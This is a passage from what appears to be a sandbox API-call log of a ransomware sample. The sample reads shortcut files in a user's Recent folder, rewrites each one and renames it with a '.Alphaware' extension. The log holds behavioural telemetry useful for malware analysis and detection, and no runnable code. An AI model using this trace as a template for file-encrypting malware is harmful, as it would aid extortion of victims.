"c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iadqh9.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2503c10 | out: lpFileInformation=0x2503c10*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf9edd20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf9edd20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf9edd20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1d9d)) returned 1 [0096.768] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IaDqH9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iadqh9.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.768] ReadFile (in: hFile=0x250, lpBuffer=0x2503ea8, nNumberOfBytesToRead=0x1d9d, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2503ea8*, lpNumberOfBytesRead=0x23e958*=0x1d9d, lpOverlapped=0x0) returned 1 [0096.787] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IaDqH9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iadqh9.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.790] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IaDqH9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iadqh9.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf9edd20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf9edd20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8be413c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2848)) returned 1 [0096.790] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IaDqH9.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iadqh9.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IaDqH9.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iadqh9.lnk.alphaware")) returned 1 [0096.791] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IdqAQbUtMr09oklG_Ot.lnk", dwFileAttributes=0x80) returned 1 [0096.791] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IdqAQbUtMr09oklG_Ot.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\idqaqbutmr09oklg_ot.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2596bb0 | out: lpFileInformation=0x2596bb0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0f80480, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0f80480, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0f80480, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13b0)) returned 1 [0096.791] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IdqAQbUtMr09oklG_Ot.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\idqaqbutmr09oklg_ot.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.791] ReadFile (in: hFile=0x250, lpBuffer=0x2596ea8, nNumberOfBytesToRead=0x13b0, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2596ea8*, lpNumberOfBytesRead=0x23e958*=0x13b0, lpOverlapped=0x0) returned 1 [0096.814] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IdqAQbUtMr09oklG_Ot.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\idqaqbutmr09oklg_ot.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IdqAQbUtMr09oklG_Ot.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\idqaqbutmr09oklg_ot.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f80480, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0f80480, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8be67520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b20)) returned 1 [0096.819] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IdqAQbUtMr09oklG_Ot.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\idqaqbutmr09oklg_ot.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IdqAQbUtMr09oklG_Ot.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\idqaqbutmr09oklg_ot.lnk.alphaware")) returned 1 [0096.820] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IoUNPPwfOO3o6JZNAZ0x.lnk", dwFileAttributes=0x80) returned 1 [0096.821] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IoUNPPwfOO3o6JZNAZ0x.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iounppwfoo3o6jznaz0x.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2422be0 | out: lpFileInformation=0x2422be0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0007580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0007580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0007580, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x316)) returned 1 [0096.821] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IoUNPPwfOO3o6JZNAZ0x.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iounppwfoo3o6jznaz0x.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.821] ReadFile (in: hFile=0x250, lpBuffer=0x2423228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2423228*, lpNumberOfBytesRead=0x23e958*=0x316, lpOverlapped=0x0) returned 1 [0096.840] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IoUNPPwfOO3o6JZNAZ0x.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iounppwfoo3o6jznaz0x.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.842] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IoUNPPwfOO3o6JZNAZ0x.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iounppwfoo3o6jznaz0x.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0007580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0007580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8beb37e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4f4)) returned 1 [0096.842] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IoUNPPwfOO3o6JZNAZ0x.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iounppwfoo3o6jznaz0x.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IoUNPPwfOO3o6JZNAZ0x.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iounppwfoo3o6jznaz0x.lnk.alphaware")) returned 1 [0096.843] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iZ2B uOZ_oASw3v_9uGC.flv.lnk", dwFileAttributes=0x80) returned 1 [0096.843] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iZ2B uOZ_oASw3v_9uGC.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iz2b uoz_oasw3v_9ugc.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24a46b8 | out: lpFileInformation=0x24a46b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd10d70e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10d70e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd10d70e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe64)) returned 1 [0096.843] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iZ2B uOZ_oASw3v_9uGC.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iz2b uoz_oasw3v_9ugc.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.843] ReadFile (in: hFile=0x250, lpBuffer=0x24a5870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24a5870*, lpNumberOfBytesRead=0x23e958*=0xe64, lpOverlapped=0x0) returned 1 [0096.862] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iZ2B uOZ_oASw3v_9uGC.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iz2b uoz_oasw3v_9ugc.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.866] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iZ2B uOZ_oASw3v_9uGC.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iz2b uoz_oasw3v_9ugc.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10d70e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10d70e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8beffaa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1408)) returned 1 [0096.866] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iZ2B uOZ_oASw3v_9uGC.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iz2b uoz_oasw3v_9ugc.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\iZ2B uOZ_oASw3v_9uGC.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\iz2b uoz_oasw3v_9ugc.flv.lnk.alphaware")) returned 1 [0096.867] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j 99Z9MOpk.pdf.lnk", dwFileAttributes=0x80) returned 1 [0096.867] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j 99Z9MOpk.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\j 99z9mopk.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x252db70 | out: lpFileInformation=0x252db70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfd7fe20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd7fe20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfd7fe20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x222)) returned 1 [0096.867] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j 99Z9MOpk.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\j 99z9mopk.pdf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.867] ReadFile (in: hFile=0x250, lpBuffer=0x252e088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x252e088*, lpNumberOfBytesRead=0x23e958*=0x222, lpOverlapped=0x0) returned 1 [0096.886] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j 99Z9MOpk.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\j 99z9mopk.pdf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.888] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j 99Z9MOpk.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\j 99z9mopk.pdf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd7fe20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd7fe20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bf25c00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4)) returned 1 [0096.888] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j 99Z9MOpk.pdf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\j 99z9mopk.pdf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j 99Z9MOpk.pdf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\j 99z9mopk.pdf.lnk.alphaware")) returned 1 [0096.889] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JhfS93kCXhB0dS47UXO.swf.lnk", dwFileAttributes=0x80) returned 1 [0096.889] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JhfS93kCXhB0dS47UXO.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jhfs93kcxhb0ds47uxo.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25ae458 | out: lpFileInformation=0x25ae458*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd15e5fa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15e5fa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3e8)) returned 1 [0096.889] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JhfS93kCXhB0dS47UXO.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jhfs93kcxhb0ds47uxo.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.889] ReadFile (in: hFile=0x250, lpBuffer=0x25aeb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25aeb58*, lpNumberOfBytesRead=0x23e958*=0x3e8, lpOverlapped=0x0) returned 1 [0096.911] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JhfS93kCXhB0dS47UXO.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jhfs93kcxhb0ds47uxo.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.915] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JhfS93kCXhB0dS47UXO.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jhfs93kcxhb0ds47uxo.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e5fa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bf71ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608)) returned 1 [0096.915] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JhfS93kCXhB0dS47UXO.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jhfs93kcxhb0ds47uxo.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JhfS93kCXhB0dS47UXO.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jhfs93kcxhb0ds47uxo.swf.lnk.alphaware")) returned 1 [0096.916] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jlPj6J.flv.lnk", dwFileAttributes=0x80) returned 1 [0096.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jlPj6J.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jlpj6j.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x242f1c0 | out: lpFileInformation=0x242f1c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd13386e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13386e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13386e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdf5)) returned 1 [0096.916] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jlPj6J.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jlpj6j.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.917] ReadFile (in: hFile=0x250, lpBuffer=0x2430288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2430288*, lpNumberOfBytesRead=0x23e958*=0xdf5, lpOverlapped=0x0) returned 1 [0096.925] CloseHandle (hObject=0x250) returned 1 [0096.943] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jlPj6J.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jlpj6j.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.947] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jlPj6J.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jlpj6j.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13386e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13386e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bfbe180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1374)) returned 1 [0096.947] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jlPj6J.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jlpj6j.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jlPj6J.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jlpj6j.flv.lnk.alphaware")) returned 1 [0096.949] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JmY86mr.swf.lnk", dwFileAttributes=0x80) returned 1 [0096.949] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JmY86mr.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jmy86mr.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24b8738 | out: lpFileInformation=0x24b8738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1018a00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1018a00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1018a00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x211)) returned 1 [0096.949] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JmY86mr.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jmy86mr.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.949] ReadFile (in: hFile=0x250, lpBuffer=0x24b8c20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b8c20*, lpNumberOfBytesRead=0x23e958*=0x211, lpOverlapped=0x0) returned 1 [0096.967] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JmY86mr.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jmy86mr.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.969] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JmY86mr.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jmy86mr.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1018a00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1018a00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bfe42e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3a0)) returned 1 [0096.969] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JmY86mr.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jmy86mr.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JmY86mr.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jmy86mr.swf.lnk.alphaware")) returned 1 [0096.971] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jNMMi.ots.lnk", dwFileAttributes=0x80) returned 1 [0096.971] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jNMMi.ots.lnk" (normalized: 